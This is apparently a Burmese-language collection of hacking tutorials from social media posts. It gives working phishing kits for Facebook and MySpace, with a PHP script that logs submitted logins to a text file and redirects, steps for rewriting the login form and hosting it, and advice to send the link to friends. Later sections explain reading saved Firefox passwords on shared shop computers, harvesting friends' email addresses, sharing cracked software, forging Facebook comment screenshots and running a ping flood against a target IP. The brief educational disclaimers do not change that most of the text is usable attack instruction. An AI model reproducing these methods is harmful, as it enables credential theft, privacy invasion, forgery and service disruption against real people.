Facebook Hacking...

အဆင့္(၁)
ပထမဆံုး notepad ကိုဖြင့္လိုက္ပါ...။
ၿပီးရင္ေအာက္မွာကၽြန္ေတာ္ေရးထားတဲ့ ေကာင္ေလးေတြကို ရိုက္ထည့္လိုက္ပါ..။
header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>
ရၿပီေနာ္ ရရင္ အဲဒီ ေကာင္ကို phishing.php ဆိုၿပီး Save ထားလိုက္ဗ်ာ...။
အဆင့္(၂)
ၿပီးေတာ့ကၽြန္ေတာ္တို႔ လိုသူငယ္ႏွပ္စား ေလးေတြလုပ္ေနက်အတိုင္း Facebook ရဲ႕ Log in page ကိုသြား
လိုက္ပါ..။ၿပီးရင္ Right Click ေထာက္..။View Page Source ကို သြား ..။ေပၚလာရင္ အားလံုးကို Select All
ေပးၿပီး notepad အသစ္တစ္ခု ထဲ မွာ ကူးထည့္ေပးပါ..။
အဆင့္(၃)
ၿပီးရင္ အဲဒီထဲမွာ Ctrl+F ႏွိပ္ၿပီး action=* ကိုရွာေပးပါ...။ေတြ႔ရင္..။ဒီလိုျဖစ္မယ္ထင္တယ္...။
ဒီလိုျဖစ္မယ္..
action=''https://login.facebook.com/login.php?''
အဲဒီေနရာမွာ..
action=''phishing.php''
လုိ႔ အစားထုိးေပးပါ...။
ရမလား ခင္ဗ်ာ...။
အဆင့္(၄)
ၿပီးရင္ အဲဒီေကာင္ကို facebooklogin.htm/ လုိ႔ေဆ့လိုက္ပါခင္ဗ်ာ..။
အဆင့္(၅)
ၿပီးရင္ notepad ကိုထပ္ဖြင့္ၿပီး Text File အလြတ္တစ္ခုကိုဖန္တီးလိုက္ပါ...။နာမည္က password.txt
ျဖစ္ပါ့မယ္..။
ေနာက္ဆံုးအဆင့္ကေတာ့ အဲဒီ ဖုိင္(၃) ဖိုင္ကို Upload လုပ္မယ့္အဆင့္ပါပဲ...။ ကၽြန္ေတာ္တို႔ အေနနဲ႕
အဲဒီ ဖိုင္သံုးဖိုင္ကို Free web hosting Site တစ္ခုခု မွာ တင္ရပါမယ္...။ဥပမာဘယ္လိုဆိုက္ေတြလဲ
ဆိုရင္
http://www.110mb.com/
http://www.ripway.com/
အဲဒီလို ဆိုက္ေတြပဲျဖစ္ပါတယ္..။ကၽြန္ေတာ္တို႔ နဖူးေတြ႕ဒူးေတြ႕ႀကံဳလိုက္ရတဲ့..Chrome.exe ဟာဆိုရင္
လည္း Ripway က hosting ယူထားတာျဖစ္ပါတယ္...။
ကၽြန္ေတာ္နမူနာ ျပမယ္ဆိုရင္ ..upload တင္ၿပီးတာနဲ႕ သူရဲ႕ URL က ဒီအတိုင္းျဖစ္ပါမယ္..။
http://sitename.110mb.com/facebooklogin.html ျဖစ္ပါ့မယ္..။
ဥပမာ ကၽြန္ေတာ္က heinlinhtun နာမည္နဲ႕ Register လုပ္ထားရင္..
http://heinlinhtun.110mb.com/facebooklogin.html ျဖစ္ပါလိမ့္မယ္...။
ဒါကိုမွ မေက်နပ္ေသးဘူးဆိုရင္ auto redirection URL ထုတ္ေပးတဲ့ ဆိုက္ေတြအမ်ားႀကီးရွိပါတယ္..။
သြားၿပီး ဆင္တူရိုးမွား ပံုစံအတုမ်ားလည္း ျပဳလုပ္လုိ႔ရပါေသးတယ္..။(လုပ္ခုိင္းတာ မဟုတ္ဘူးေနာ္)
အဲဒါၿပီးရင္ေတာ့ အဲဒီ လင့္ခ္ကိုယူ သူငယ္ခ်င္းဆီကိုပို႔ ဟိုဘက္က Log in ၀င္တာနဲ႕...ကြိၿပီပဲေနာ္..။
ကိုလင္းပို႕ေလး ရွယ္ေပးထားတာပါ ....

ဆိုင္ေတြမွာ Mozilla သံုးရင္ သတိထားမယ္

Mozillafirefox မွာ User Name နဲ႕ Password ေတြကို ပိုင္ရွင္မသိေအာင္ ၾကည့္လို႕ရပါတယ္....
လုပ္နည္းေလးကေတာ့ ....
1.Mozilla Firefox က Tool ထဲ၀င္ပါ ...
2.ၿပီးရင္ အဲထဲက Page Info ကို၀င္ပါ ....
3.Page Info ထဲေရာက္ၿပီဆိုရင္ အဲထဲက Security ကို၀င္ပါ....
4.View Saved Passwords ဆိုတာ ရွိတယ္ အဲထဲ၀င္ၿပီးရင္ ဖယားေလးတစ္ခု ပြင့္လာမယ္ Save Passwords ဆိုတာေလးပါ .... ဟဲ ... အဲမွာေမႊလို႕ရပါၿပီ ....
ဥပမာ- ဥပမာ အရင္လူက Facebook သံုးခဲ့တယ္ ဆိုပါေတာ့ Search မွာ www.facebook.com လို႕ရိုက္လိုက္ပါ .... URL ကေတာ့ မွန္ကန္ရပါမယ္ .... ဒါလည္းမခက္ပါဘူး မ်ားေသာအားျဖင့္ ဆိုင္ေတြမွာသံုးတဲ့အခါ ေမာ္ဇီလာအက္ဒရက္ဘားထဲမွာ စာလံုးတစ္လံုးစ ႏွစ္လံုးစ ရိုက္ၾကည့္ရံုနဲ႕တင္ ေရွ႕ကသံုးထားတာေတြ စီက်လာမွာပါ ...... အဲတာေတြကို ဆိုလိုတာပါ .... User Name ေတြကို ေတြ႕ရမွာပါ ... တစ္ခုခုေရြးၿပီး View Password ႏွိပ္လိုက္ပါ .... Warning တက္လာရင္ Yes သာေပးလိုက္ပါ .... ဒါဆို User Name ေဘးမွာ Password ေတြကို ေတြ႕ရၿပီေပါ့ ....

မွတ္ခ်က္.......(အက်င့္ယုတ္တဲ့ကုလားဆိုင္ေတြ သြားသံုးမိတဲ့ ေကာင္မေလးေတြ ပိုသတိထားသင့္တဲ့ ကိစၥပါ ဆိုင္ဆာဗာကေန User ရဲ႕ နည္းပညာအားနည္းမွုကို အခြင့္ေကာင္းယူသြားႏိုင္ပါတယ္ .... အလြယ္တကူ မိမိဓာတ္ပံုေတြကအစ လိုင္းေပၚတင္လုပ္ၾကံခံရတာကလည္း ဒီလိုနည္းေလးေတြလည္း အပါအ၀င္ေပါ့ .....သူတပါးကိုညစ္ပတ္ဖို႕မဟုတ္ပါဘူး ... သတိထားႏိုင္ေအာင္ တင္ေပးလိုက္တာပါ....)

Facebook သူငယ္ခ်င္းေတြရဲ႕ Gmail ေဖာ္ၾကည့္မယ္

ေဖ့ဘြတ္တြင္ သူငယ္ခ်င္းျဖစ္ထားေသာသူမ်ား၏ Email လိပ္စာေဖာ္ၾကည့္ဖို႕က မခဲယဥ္းပါဘူး ....
http://www.friendstogmail.com ကို ကလွစ္လိုက္ပါ ....
မ်ားေသာအားျဖင့္ facebook ရဲ႕ User Profile တိုင္းမွာ Email မေဖာ္ျပထားပါဘူး ၾကည့္ခ်င္ရင္ about ဆိုတဲ့လင့္ေလးကို ကလွစ္ၿပီး ၾကည့္ရတယ္ ဒါေတာင္ မေဖာ္ျပထားရင္ မေတြ႕ရပါဘူး ...မ်ားေသာအားျဖင့္ ေဖ့ဘြတ္အေၾကာင္းနည္းနည္းနားလည္လာတဲ့သူေတြက ေဖ်ာက္ထားတတ္ပါတယ္... မေတြ႕ရပါဘူး ....
ဒီနည္းကေတာ့ ေဖာ္ျပထားထား မထားထား ကိုယ့္သူငယ္ခ်င္းေတြရဲ႕ ေဖ့ဘြတ္၀င္တဲ့ အီးေမးကို သိႏိုင္ပါတယ္ ....
လုပ္ၾကည့္ဖို႕က မခဲယဥ္းပါဘူး Friend to Gmail and Google+ ေဘာက္စာမ်က္ႏွာတြင္ Load Friends ကလွစ္ပါ ကုဒ္အျဖစ္ေပၚလာပါက ကူးၿပီး Notepad နဲ႕ Save လုပ္ပါ ....
Save လုပ္သည့္ အခါ
1.File name တြင္ name.csv
2.Save as type တြင္ All Files
3.Encoding တြင္ ANSI
ေျပာင္းထည့္ၿပီး desktop ေပၚတြင္ Save ၾကည့္ပါက excel ဖိုင္ပံုစံေတြ႕ျမင္ရမွာပါ ...
open ၾကည့္ပါက Gmail,Address ေတြနဲ႕ User name ေတြကို သူငယ္ခ်င္းေတြနဲ႕ အဆက္အသြယ္ရွိထားသေလာက္ ေတြ႕ျမင္ရမွာပါ ......
ေဆာ့၀ဲသံုးရင္ IP မိရင္မိသြားႏိုင္တယ္ ဒီနည္းက စိတ္ခ်ရပါတယ္ ......
(အေၾကာင္းမဲ႕သူမ်ား အေကာင့္ဟက္ဖို႕ Gmail သိဖို႕တင္ေပးတာမဟုတ္ဘူးေနာ္ .....ဟိ ကိုယ့္ပါျပန္ေဖာ္ဟက္ေနမွာစိုးလုိ႕ ၾကိဳေျပာထားတာ .. အဲလိုဆို ခ်ာခ်မားဟက္ကာေတြနဲ႕တိုင္မွာေနာ္)

Wifi Share သံုးမယ္

ကဲေဘာ္ဒါတို႕ ဒါကေတာ့ Connectify ဆိုတဲ့
Laptop ကေနၿပီးေတာ႔ Wifi Share ေပးလိုသူမ်ားအတြက္ ဒီေဆာ့၀ဲလ္ ေလးကို Patch ဖိုင္နဲ႔အတူ ရွယ္လိုက္ပါတယ္။ Wifi Share ေပးတဲ႔ ေနရာမွာ မိမိတို႔ ႏွစ္သက္သလို Password ခံေပးႏုိင္ပါတယ္။ Internet Sharing အတြက္ဆိုရင္ Firewall ကို Off ေပးထားႏိုင္ရင္ပိုေကာင္းပါတယ္။ ေအာက္မွာLink ေပးထားတယ္ အသံုးလိုတဲ့သူ ယူသြားလိုက္ဗ်ာ။
ဒီမွာ ကလွစ္ ႏွိပ္ပါ

ေဖ့ဘြတ္ကြန္မန္းေပ့ ျပင္နည္း

ပထမဆံုး မိမိလုပ္ခ်င္တဲ့ ေဖ့ဘုတ္ဂရုစာမ်က္ႏွာတခုကို
Save page as >> Web page , complete နဲ ့ save
လိုက္ပါ .. ၿပီးရင္ save ထားတဲ့ web page ကို Notepad
နဲ ့ဖြင့္ၿပီး မိမိၿပင္လိုတဲ့ ပို ့စ္ကို ရွာၿပီး မိမိထည့္လိုတဲ့နစ္နိမ္း
မ်ား .. စာသားမ်ား ထည့္ၿပီးၿပင္လိုက္ပါ .. ၿပင္ၿပီးရင္ Note
pad ကို save ပါ ..
( မိမိထည့္သြင္းထားတဲ့ .. စာသားမ်ားက ရွည္ေနလို ့ enter
ေခါက္ခ်င္ရင္ enter ေခါက္ခ်င္တဲ့ေနရာမွာ <br> လို ့ရိုက္ထည့္
ပါ .. )

ၿပီးရင္ မိမိ save ထားတဲ့ web page ကို ကလစ္ႏွိပ္ၿပီးဖြင့္လိုက္
ပါ .. အဲ့ဒါဆို ကိုယ္ၿပင္ထားတဲ့ စာမ်က္ႏွာပြင့္လာပါလိမ့္မယ္ ..
အဲ့ဒီစာမ်က္ႏွာကို Screen Shot လုပ္လိုက္ပါ .. ၿပီးရင္အဲ့ဒီ
Screen Shot ကို ဖိုတိုေရွာ့ သို ့မဟုတ္ GIMP 2 နဲ ့ဖြင့္ၿပီး မိမိထည့္
လိုတဲ့ ဓါတ္ပံုမ်ားကိုထည့္ပါ ..

မိမိလုိခ်င္တဲ့ ဓါတ္ပံုမ်ားကို အၿခားသူေတြရဲ ့ပရိုဖိုင္ပံုေတြကို ေကာ္ပီ
ကူးၿပီးယူလို ့ရပါတယ္ .. ဒါ့အၿပင္ web page ကို save တုန္းကတခါ
တည္းပါလာတဲ့ ဖိုလ္ဒါ ထဲမွာလည္း ယူလို ့ရပါတယ္ ..

Webpage အတုဖန္တီးမယ္ ...

အခုေျပာမွာက Myspace Webpage အတုဖန္တီးမွာျဖစ္ပါတယ္။
တစ္စုံတစ္ဦးကိုနစ္နာလိုေသာရည္

ရြယ္ခ်က္မရိွပါ။ နည္းပညာကိုပိုစိတ္၀င္စားလာေစရန္အတြက္ ႏွင့္ ကာကြယ္တတ္ရန္အတြက္သာျဖစ္ပါသည္။
Phishing ဆိုတာဘာလည္း ?
Web site အတုေတြကိုဖန္တီးတာေပါ့။ Identify theft ဆိုရင္လည္းမမွားပါဘူး
Web site အတုဆိုတာကိုနားမလည္ဘူး
Web site အတုဆိုတာနာမည္ႀကီးတဲ့ website
ေတြကိုသူ႕ပုံစံအတိုင္းဖန္တီးထားတာဘဲျဖစ္ပါတယ္။

ဘာလို႕ဖန္တီးတာလည္း ?
ဥပမာေျပာရရင္ gmail ပုံစံ site တစ္ခုဖန္တီးလိုက္မယ္ဆိုပါစို႕…
အဲဒီ web site အတုနဲ႕သြား၀င္မိရင္ ကိုယ့္ gmail user name နဲ႕ password
ေတြပါသြားၿပီေပါ့

ဘယ္လိုဖန္တီးမွာလည္း ?
ပထမဆုံး website အတုဖန္တီးခ်င္တဲ့ တကယ့္ site ကိုသြားပါ
MySpace site ကိုဖန္တီးခ်င္တယ္ဆိုပါဆို႕ http://myspace.com ကိုသြားပါ
Webpage ရဲ႕ source ကို ၾကည္႕ပါ။ ေနာက္ၿပီး copy လုပ္ပါ
အခုသင့္မွာ webpage ရဲ႕ source ရိွေနၿပီဆိုရင္…အဲဒါေတြကို web hosting
တစ္ခုခုမွာတင္လိုက္ပါ
အဲဒီ hosting ဟာ php enable ျဖစ္ရပါမယ္
Web hosting မွာတင္ၿပီး index.html ဆိုတဲ့ file အေနနဲ႕ save လုပ္ပါ
Index.html နဲ႕ save လိုက္ရင္ default home page ျဖစ္သြားမွာမို႕လို႕ပါ
Php scriptတစ္ခုတည္ေဆာက္ပါမယ္။ ဘာလို႕လည္းဆိုရင္သင့္ webpage အတြက္ log
fileတစ္ခုဖန္တီးခ်င္လို႕ရယ္၊ ေနာက္ၿပီး တကယ့္
websiteကိုလမ္းေၾကာင္းေျပာင္းသြားဖို႕အတြက္ပါ

Notepad ကိုဖြင့္ပါ log.txt ဆိုတဲ့ file name နဲ႕ save လုပ္ပါ
Index.html ကို upload လုပ္ထားတဲ့ site မွာဘဲသြားၿပီး upload လုပ္ပါ
Php script နဲ႕ပတ္သက္လို႕ေလ့လာခ်င္ရင္ေတာ့ ဒီ site ေတြကိုသြားပါ
www.tizag.com, www.w3schools.com, မွာသြားေရာက္ေလ့လာႏိုင္ပါတယ္

header (’Location: http://myspace.com ‘);
$handle = fopen(”log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

အေပၚကျပထားတဲ့ code ေတြကို Notepad ေပၚမွာေရးခ်ၿပီး redirect.php
ဆိုတဲ့နာမည္နဲ႕ သိမ္းလိုက္ပါေနာက္ upload လုပ္ပါ
Index.html မွာျပင္စရာေလးေတြက်န္ေနေသးပါတယ္။ ဒီေတာ့ index.html ကို
notepad နဲ႕ဖြင့္ပါ။
action= ကိုရွာပါ။ action နဲ႕ပတ္သက္တာေတြကအမ်ားႀကီးပါ အဓိကလိုခ်င္တာက
user name နဲ႕ passwordေတြကိုဘယ္မွာသြားၾကည္႕ တယ္ဆိုတဲ့လမ္းေၾကာင္းကိုသိခ်င္တာပါ။ ဒီမွာေတာ့
E-mail ဆိုတဲ့ နာမည္ေလးနဲ႕ဘဲ
index file ထဲမွာထပ္ရွာလိုက္ပါအုန္း။
action ထဲမွာပါ၀င္တဲ့စာသားေတြကိုဖ်က္ၿပီး။ redirect.php ကိုအစားထိုးပါ။
အခုဆိုရင္ေတာ့သင္ဟာ webpage အတုတစ္ခုကိုတည္ေဆာက္ၿပီးသြားပါၿပီ……..

PING OF DEATH

CMD ျဖင့္ DOSတိုတ္ခိုက္ျခင္း
by Myanmar Hacker Power Group on Thursday, September 6, 2012 at 8:29pm ·

- Dos Attack ဆိုတာ Denial of Service Attack ကိုဆိုလိုျခင္းျဖစ္ပါတယ္

 ကိုယ္တိုက္္ခိုက္လိုေသာသူ၏ services
မ်ားကိုပိတ္ပင္ျခင္းတစ္နည္းအားျ

ဖင့္သူ၏လုပ္ငန္းမ်ားဆက္လက္မလုပ္ေဆာင္ႏိုင္ေအာင္ရပ္ဆိုင္းပစ္ျခင္းတို႕ကိုဆိုလိုပါတယ္…

- End-user systems, servers, routers နဲ႕ Website စတာေတြကိုတိုက္ခိုက္ႏိုင္ပါတယ္
- တိုက္ခိုက္ဖို႕အတြက္လိုအပ္ခ်က္မ်ားကေတာ့

၁. Command Prompt (CMD or DOS) windows system မွာပါလာၿပီးသားျဖစ္ပါတယ္

 ၂. တိုက္ခိုက္လိုေသာ ကြန္ပ်ဳဳတာ သို႕ website ၏ IP address

- Website ၏ IP address ကိုဘယ္လိုရႏိုင္မလည္းဆိုရင္
၁. CMD ကိုဖြင့္ပါ
၂. Nslookup website name ရိုက္ထည္႕ပါ (ဥပမာ- nslookup www.google.com)
၃. Website ၏ IP addresss က်လာပါလိမ့္မည္။

- စတင္တိုက္ခိုက္ျခင္း
၁. CMD ကိုဖြင့္ပါ။
၂. Ping Site-IP -l 65500 –n 10000000 –w 0.00001 လို႕ရိုက္ထည္႕ပါ။
(Site-IP ေနရာတြင္တိုက္ခိုက္လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address ကိုရိုက္ထည္႕ရပါမည္။)
Site-IP = ေနရာတြင္တိုက္ခိုက္ လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP addressကို ရိုက္ထည္႕ရပါမည္။

-n 10000000 = အႀကိမ္10000000 တိုက္ခိုက္မည္ဟုေျပာျခင္းျဖစ္သည္။ အႀကိမ္အေရအတြက္
ကိုေျပာင္းလဲႏိုင္ပါတယ္

-w 0.00001 = တစ္ႀကိမ္တိုက္ခိုက္ၿပီးေနာက္ဘယ္ေလာက္ၾကာရင္ေနာက္တစ္ခါထပ္တိုက္ခိုက္
မွာလည္းကိုေျပာျခင္းပါတယ္

သတိျပဳရမွာကေတာ့ -l, -n နဲ႕ -w
ေတြကိုျဖဳတ္ၿပီးသုံးရင္တိုက္ခိုက္ႏိုင္မွာမဟုတ္ပါဘူး။

- အခုလိုတိုက္ခိုက္ျခင္းကို “PING OF DEATH” လို႕လည္းေခၚပါတယ္ ။